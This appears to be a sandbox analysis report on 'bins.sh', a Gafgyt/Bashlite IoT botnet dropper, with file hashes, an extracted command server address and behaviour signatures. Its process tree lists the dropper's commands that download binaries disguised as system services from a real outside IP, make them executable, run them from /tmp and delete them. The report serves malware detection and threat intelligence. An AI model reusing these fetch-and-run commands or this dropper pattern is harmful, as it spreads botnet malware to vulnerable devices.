Analysis
-
max time kernel
124s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
26/02/2025, 16:54
General
-
Target
bins.sh
-
Size
1KB
-
MD5
3fe001266d6743a61f371e35d18a362a
-
SHA1
63e6fb3e130d0204b47845ea33234d2aebf318de
-
SHA256
409f0f68302f6d7e81372c924901b89c01d6d64df78dad529e4b5edf2c15b4a1
-
SHA512
1cb24458f4848eeb53f34e495e0ca349eefaf86082ca024b2f958ed55ad41c2abc4022aee3d4e1e9333cc67f75f274e9090838ba12fb84c42018f9a7ba9dda46
Malware Config
Extracted
gafgyt
185.224.0.18:23
Signatures
-
Detected Gafgyt variant 11 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 11 IoCs
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Changes its process name 2 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
- Reads system routing table
- Changes its process name
- Reads system network configuration
-
/usr/bin/wgetwget http://185.224.0.18/ntpd2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x ntpd2⤵
- File and Directory Permissions Modification
-
-
/tmp/ntpd./ntpd2⤵
-
-
/bin/rmrm -rf ntpd2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/sshd2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x sshd2⤵
- File and Directory Permissions Modification
-
-
/tmp/sshd./sshd2⤵
-
-
/bin/rmrm -rf sshd2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/openssh2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x openssh2⤵
- File and Directory Permissions Modification
-
-
/tmp/openssh./openssh2⤵
-
-
/bin/rmrm -rf openssh2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/bash2⤵
-
-
/bin/chmodchmod +x bash2⤵
- File and Directory Permissions Modification
-
-
/tmp/bash./bash2⤵
-
-
/bin/rmrm -rf bash2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/tftp2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x tftp2⤵
- File and Directory Permissions Modification
-
-
/tmp/tftp./tftp2⤵
-
-
/bin/rmrm -rf tftp2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/wget2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x wget2⤵
- File and Directory Permissions Modification
-
-
/bin/rmrm -rf wget2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/cron2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x cron2⤵
- File and Directory Permissions Modification
-
-
/tmp/cron./cron2⤵
-
-
/bin/rmrm -rf cron2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/ftp2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x ftp2⤵
- File and Directory Permissions Modification
-
-
/bin/rmrm -rf ftp2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/pftp2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x pftp2⤵
- File and Directory Permissions Modification
-
-
/tmp/pftp./pftp2⤵
-
-
/bin/rmrm -rf pftp2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/sh2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/sh./sh2⤵
-
-
/bin/rmrm -rf sh2⤵
-
-
/usr/bin/wgetwget "http://185.224.0.18/[cpu]"2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x "[cpu]"2⤵
- File and Directory Permissions Modification
-
-
/tmp/[cpu]"./[cpu]"2⤵
-
-
/bin/rmrm -rf "[cpu]"2⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/apache22⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x apache22⤵
- File and Directory Permissions Modification
-
-
/tmp/apache2./apache22⤵
-
-
/bin/rmrm -rf apache22⤵
-
-
/usr/bin/wgetwget http://185.224.0.18/telnetd2⤵
-
-
/bin/chmodchmod +x telnetd2⤵
- File and Directory Permissions Modification
-
-
/tmp/telnetd./telnetd2⤵
-
-
/bin/rmrm -rf telnetd2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
139KB
MD5ad3b88f90f89cd8c724d159f7f95a0b5
SHA12bc8029b17b387cc85c5a0b26e261235b0ea7c7e
SHA256293b468b4a255880846ddc28e5900c2ca6f3dc60abfb9952c6267fe1eeaeed84
SHA5123819a3c424474101b368bebcaca69a5003652f6921bbedb69192422e6ad9ba3ee7ffc6db96f35cff52eaff36974bab0fa19ff12c527c9ffcc91db5fc29d936bd
-
Filesize
132KB
MD5d68f347c491696a4a404ec56ce918b99
SHA1036421b825a71f1d27502e9ee2c66e1a9d56fdbc
SHA25659f0a1d17b840ea70363ba76f602ba2bd8aeff804060585814753afe5b1ead1b
SHA512decab46b0f4c4f4577399576c64eb6a35362360b9cf9d545ed4bb7f75b7e63499a24862d16b6112101f80f5731dfd316c2091b3924eb3d370b8f21c6c88aa8a6
-
Filesize
126KB
MD51019ae676f2b186d80b4a64e4d7ce979
SHA174052602698124537501c89ffb1cf20f96f16351
SHA256de2e2ca7485edbcb2ab5ad35a2d4911d2bcd9b71365f54a5c0d7c37ab584b55b
SHA5124ee1c8456117e308cc8b3baacf28c2e42dd878c16c568973219b06fb48ff540b2cbda3ebfaa16a5c64ff8e6ca9159cc224288bf4854095e26d34c5319320d3bd
-
Filesize
113KB
MD5ba20264e5784f53f593fa0895f77c0b2
SHA18e9f5d9a92a918f3cd5da0a19d866918edbdcd97
SHA256da6a2d0e481b64336f781b8f9f5b83816b1d1d3fef19907e8c85014c6bf87eb2
SHA512b5eda9e190524f64c58ab1c9326e036920604c22558421ab5d5b59ddd91b703c3901924a12ce704859cd850c4aa2c8d2c62d6a0126f086747b14df2d4996904b
-
Filesize
161KB
MD5109318b8402297c86da949e68b59d245
SHA1eb89f87d56e1af243d352065c3678d2b8854e6c0
SHA256401b52db675d8763850c287d7483a4c35d94ac4571a27475318893a2c727797a
SHA51258fc185b0d7c52eea48ec4d38d6f6889b5945d7947743241f6b4cf701a8a6bf9b8aef75a51bda7412fcc40bc04e8c29758a96865a5cde10fd321618f68f21792
-
Filesize
120KB
MD5bdbfff5bdf44a00110d4a749d56cbacd
SHA17a8a78030b15dfdbef6b1413813f0ac49168b076
SHA2564cff7e838e506a4b0d3c8c90032d9117a5ee16f400eab5bfeae2e7dd2c8a74b5
SHA512bbc3e2a644ae927bb4d9b3016cf4dff8b3444f3e87a44687420aa32e29cd102778d5882599d3583d53c213ad8f3d045988a22f11c76ea0083999104e51d49763
-
Filesize
131KB
MD589d38a917792864e1658397e216d7919
SHA1761d242b6b15c3baf83dc60b0ea574251c86a6a8
SHA2566097eeb660e58ca8d3dfedc76f3a6def567538d1427233f8b44b19d1e42bb5c3
SHA512734cd606af808bb7965429f597f8beb3304dc28a275c96da0268db96adf2df8109e9feb60911724813589eacf8f83930970e79536a581bf0fc96e8597dcfbfda
-
Filesize
142KB
MD51a29d5764ebdedbf96b4171d8b53c875
SHA125db69f73d154ccab06109eeb9e1a6876201a08f
SHA256b1fea583e42919e9b71fc9a6ca8b7d20aef45a63e2a9b8ddea36bb1ed884ef09
SHA51284041c3db086133c1d3dce3fea02eda526d5629681709dc74ff2777e560d2e62343877d07a341d3bb656859f717c9baae6f79203c68e995c06e9db64b98cdc81
-
Filesize
161KB
MD5c508e7ace15264e5ff4f463432c3a32e
SHA132e29ac335a2eff62ce938e43ad993324dd3ded8
SHA256f255756df50c2a912392e95adf2f42adfb546880aea8d6bf15162d1e2a7f2dd9
SHA51271b4a88fe38ecb7cab6463d9b36fa2e783d342f53f3362fa48cb4fd3f827daa0dc96afeed5b4abbe46473b821b785b3de9963f9b04fc7ec26badde2f3df67afd
-
Filesize
154KB
MD5fb60037e32b5ef7ea135dff35b6114ea
SHA1f95f587f124d66b985611ed9d571d8622a481676
SHA2563a4fc36dee8b7024bedec2c2345a7ac8a7d54b65fa000eed778c70d7443d8402
SHA51265a3c8ee7e26d734169e850b4c11f724f2b6d23b96458200b8e8994760054114562aacae2f78d70900e6516fd80dff2787284a64bf2778130c54cb64ac002c8b
-
Filesize
116KB
MD57f3328ac731e1f5914ddf381df585f6d
SHA1e60b12d8c77e90bcd3ce00e3d392c7d82ea0fe4b
SHA256874619d177f349b3987c881b016feaa08fec5a16df7cb2ab473d88ea493a4c56
SHA5126d1f5c755460da3740ee81362d617e7a52f1908253e6959e1a3d127cd831e88895b01bf47bfb57c7357c8bb5d0f743e700ca7db27e601b7b08adf5f09edd4418